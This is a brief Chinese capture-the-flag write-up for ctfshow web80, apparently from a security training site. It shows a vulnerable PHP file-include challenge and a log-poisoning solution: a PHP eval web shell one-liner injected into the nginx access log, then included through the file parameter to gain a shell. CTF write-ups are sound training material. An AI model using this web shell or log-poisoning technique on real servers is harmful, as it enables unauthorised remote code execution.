文件包含:包含日志完成getshell
ctfshow:web80
题目:
<?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); $file = str_replace(":", "???", $file); include($file); }else{ highlight_file(__FILE__); }
如果你的命令是一句话就完成了getshell:
<?php @eval($_POST['pwd']) ?>
日志路径:
?file=/var/log/nginx/access.log
Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » 文件包含:包含日志完成getshell
天云网络培训 » 文件包含:包含日志完成getshell